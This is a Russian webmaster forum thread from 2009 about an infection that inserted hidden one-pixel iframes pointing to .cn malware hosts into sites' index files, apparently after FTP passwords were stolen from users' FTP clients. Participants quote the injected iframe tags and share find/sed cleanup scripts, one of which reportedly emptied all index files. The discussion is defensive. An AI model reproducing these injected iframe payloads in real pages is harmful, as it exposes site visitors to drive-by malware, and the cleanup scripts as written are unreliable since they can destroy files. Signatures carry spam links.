АРМАДА
господи.. боже мой..
На страницу Пред.  1, 2, 3  След.
Новая тема Написать ответ Advanced Hosters - профессиональный хостинг
Ср Мар 18, 2009 9:37 pm Start Post: господи.. боже мой.. 

Orvas
I have never been clever
Зарегистрирован: 26.03.2008
Сообщений: 3613
Обратиться по нику
# Добавлено:Чт Мар 19, 2009 4:24 amОтветить с цитатой
Grab писал(а):
этот скрипт затер все индексы в 0

Laughing
Сочуствую

DrKronos
SEO-доктор
Зарегистрирован: 11.03.2008
Сообщений: 10811
Moder (Сумма: 1)
Обратиться по нику
# Добавлено:Чт Мар 19, 2009 1:41 pmОтветить с цитатой
Цитата:
#!/bin/sh
find . -print0 | xargs -0 grep -l 517891 > vir-list.txt

while read line
do
sed 's/:<iframe frameborder=0 border=0 height=1 width=1 src="http:\/\/517891.cn\/in.cgi?8"//g' <$line >tmp
mv tmp $line
done < vir-list.txt


Shocked Вот она, смерть адалта.
Oscar the grouch EvaPharmacy. Буржуй не спит, таблетку ждёт – руби бабло хоть круглый год! Инвайты: [email protected]
Grover Здесь могла быть ваша реклама : [email protected] A Little Feedback Please!

IseeDeadPeople
Объединенная Электрическая
Зарегистрирован: 06.12.2005
Сообщений: 18041
Обратиться по нику
# Добавлено:Чт Мар 19, 2009 3:37 pmОтветить с цитатой
кстати, кажеться вирь ФТП-пароли из FAR-а вытащить несмог.. только из современных ФТП манеджеров..

а если гугль заметит фрейм-вирь на сайте..
он повесит табличку..
если я через 2-3 дня отремонтирую, гугль мои права востановит.. или бан сразу.. или через сколько.. - как действовать ?

Есть такие ФТП менеджеры где криптуються данные логин/пасс.. т.е. ФТП менеджер устойчивый к таким вирям, и просто так пароли не даст.

?

#!/bin/sh
find . -print0 | xargs -0 grep -l 517891 > vir-list.txt

while read line
do
sed 's/:<iframe frameborder=0 border=0 height=1 width=1 src="http:\/\/517891.cn\/in.cgi?8"//g' <$line >tmp
mv tmp $line
done < vir-list.txt


чего этот скрипт делает ? и где его и как запустить ?
video sex chat mobile sex

Fraud
Опытный
Зарегистрирован: 27.07.2007
Сообщений: 309
Обратиться по нику
# Добавлено:Чт Мар 19, 2009 4:04 pmОтветить с цитатой
У меня тоже на всех сайтах фреймы Sad
Меняла пароли - не помогло.
Думаю массовое заражение
На компе только файерволл стоит....

sydoow
V.I.P.
Зарегистрирован: 29.06.2007
Сообщений: 8213
Обратиться по нику
# Добавлено:Чт Мар 19, 2009 5:00 pmОтветить с цитатой
Скиньте пожалуйста в личку что за хост.

IseeDeadPeople
Объединенная Электрическая
Зарегистрирован: 06.12.2005
Сообщений: 18041
Обратиться по нику
# Добавлено:Чт Мар 19, 2009 5:03 pmОтветить с цитатой
У меня тоже на всех сайтах фреймы
я их видел (фреймы) только в индекс файлах.. больше негде.. а ты ?
да и то кажеться.. заражалися только те сайты, где индекс файлик в папке public_html ~~
также, взломаны были те логины/пароли которые были не в ФАРе.. а в ФАРе ничего вродеб нетрогали...

Меняла пароли - не помогло.
я сменил, мне помогло..
возможно ты просто несделил этот вирь.. и он снова "ворует"..

Думаю массовое заражение
Виндовсов или Линуксов ?

На компе только файерволл стоит....
У меня Каспер (мощный кстати пакет, тама и веб фильтры есть... - рек.

Через Касперского можно справки навести.. что за вирь и что он делает ?
video sex chat mobile sex

IseeDeadPeople
Объединенная Электрическая
Зарегистрирован: 06.12.2005
Сообщений: 18041
Обратиться по нику
# Добавлено:Чт Мар 19, 2009 5:57 pmОтветить с цитатой
.. вставляеться фрейм на линк
wcount (.) net/com/index.php

куда писать чтоб домен заблочили ?
video sex chat mobile sex

Grab + +
Опытный
Зарегистрирован: 19.11.2007
Сообщений: 126
Обратиться по нику
# Добавлено:Чт Мар 19, 2009 7:42 pmОтветить с цитатой
итак выводы
вот здесь
Код:
sed 's/:<iframe frameborder=0 border=0 height=1 width=1 src="http:\/\/517891.cn\/in.cgi?8"//g' <$line >tmp

именно
Код:
s/:

под вопросом тк
Код:
sed 's/foo/bar/g' filename (standard replace command)


далее без экранирования через \ я получал только 0 размер файлов
в итоге мой код для html стал таким (php там немного добавлено еще)
Код:
#!/bin/sh

find . -name '*.html' -exec grep -l "cocacola" {} \; > vir-list.txt

while read line
do
sed 's/\<iframe\ src=\"http:\/\/homenameregistration.cn\/in.cgi\?income12\"\ width=1\ height=1\ style=\"visibility:\ hidden\"\>\<\/iframe\>\<\iframe\ src=\"http:\/\/filmlifemusicsite\.cn\/in\.cgi\?cocacola95\"\ width=1\ height=1\ style=\"visibility:\ hidden\"\>\<\/iframe\>\<iframe\ src=\"http:\/\/promixgroup\.cn\/in.cgi\?cocacola91\"\ width=1\ height=1\ style=\"visibility:\ hidden\"\>\<\/iframe\>\<iframe\ src=\"http:\/\/betstarwager\.cn\/in.cgi\?cocacola86\"\ width=1\ height=1\ style=\"visibility:\ hidden\"\>\<\/iframe\>//g' $line > tmp

mv tmp $line
done < vir-list.txt


в любом случае пользоваться этим надо осторожно, иначе можно потерять все, самый оптимальный подход выполнить поиск с записью в файл и если не много поправить все руками и заодно поставить chmod 444
P.S. каким методом выставляется iframe я так и не понял, шелов нет вроде нигде, пароли каждый день меняю и запускаю клиента из под sandboxie, вообщем хз

IseeDeadPeople
Объединенная Электрическая
Зарегистрирован: 06.12.2005
Сообщений: 18041
Обратиться по нику
# Добавлено:Чт Мар 19, 2009 10:02 pmОтветить с цитатой
.. похищение пароль было с локальной машины из почти всех фтп-менеджеров.. (Фар непробили)

для того чтоб такого больше небыло..

Есть такие ФТП менеджеры где криптуються данные логин/пасс.. т.е. ФТП менеджер устойчивый к таким вирям, и просто так пароли не даст.

спасибо.
video sex chat mobile sex

IseeDeadPeople
Объединенная Электрическая
Зарегистрирован: 06.12.2005
Сообщений: 18041
Обратиться по нику
# Добавлено:Пт Мар 20, 2009 2:09 pmОтветить с цитатой
ну так...
Есть такие ФТП менеджеры где криптуються данные логин/пасс.. т.е. ФТП менеджер устойчивый к таким вирям, и просто так пароли не даст.

CuteFtp - напр, - имеет такую защиту ?
video sex chat mobile sex

tal
Свой
Зарегистрирован: 23.03.2009
Сообщений: 1
Обратиться по нику
# Добавлено:Вт Мар 24, 2009 2:39 pmОтветить с цитатой
У меня на сайте в индексных файлах .html .shtml .php появилась такая [b][size=18]дрянь!!! [/size][/b] [b]iframe src="_http://mediahomenamemartvideo.cn/in.cgi?income21" width=1 height=1 style="visibility: hidden"></iframe[/b]
в 3-х экземплярах после тегов [b]титл[/b] и [b]боди[/b]
Как узнали пароли? И поможет ли смена паролей в дальнейшем?

shhef +
V.I.P.
Зарегистрирован: 14.09.2007
Сообщений: 7695
Обратиться по нику
# Добавлено:Вт Мар 24, 2009 7:06 pmОтветить с цитатой
люди добрый скажите, де оно торчит? только в индексах или еще де?

просто у меня индексы, почти все "зазендены"
Облачный сервер за 5 у.е. + 10 у.е на счет при регистрации по моей ссылке. Разные страны! Лучший треккер!

Fraud
Опытный
Зарегистрирован: 27.07.2007
Сообщений: 309
Обратиться по нику
# Добавлено:Вт Мар 24, 2009 7:20 pmОтветить с цитатой
Только в индексах встречала

Romano
Опытный
Зарегистрирован: 08.12.2008
Сообщений: 103
Обратиться по нику
# Добавлено:Вс Мар 29, 2009 3:29 amОтветить с цитатой
Цитата:
CuteFtp - напр, - имеет такую защиту ?


в PRO версии да, в HOME не знаю...

Цитата:
люди добрый скажите, де оно торчит? только в индексах или еще де?


бывает и на второстепенных страницах прописываются... ну это уже видимо ручная работа.
Наполни свой сайт контентом и найди помощников!

J_Geer
Опытный
Зарегистрирован: 27.03.2006
Сообщений: 159
Обратиться по нику
# Добавлено:Пн Мар 30, 2009 5:52 amОтветить с цитатой
Fraud писал(а):
У меня тоже на всех сайтах фреймы Sad
Меняла пароли - не помогло.
Думаю массовое заражение
На компе только файерволл стоит....


Была 1 раз така хрень на одном хосте. Менял пароли - не помогло. Помогло chmod 444 на все index.* файлы. И зазендил все index.php файлы, которые можно зендить. Фишка в том, что при добавлении этой хрени нарушается код зенда и показывается просто чистая страница, а изменение отслеживается на ура ресип-чекером. По крайней мере, у меня на хосте было так.
А антивирус на компе должен стоять обязательно, если не какой-нить *nix стоит, там вроде с этим получше...
Good host. Traffic trade and Links trade. SiteMonitor
Новая тема Написать ответ    ГЛАВНАЯ ~ ТЕХНИЧЕСКИЕ ВОПРОСЫ

Перейти:  





Генеральный спонсор



Партнеры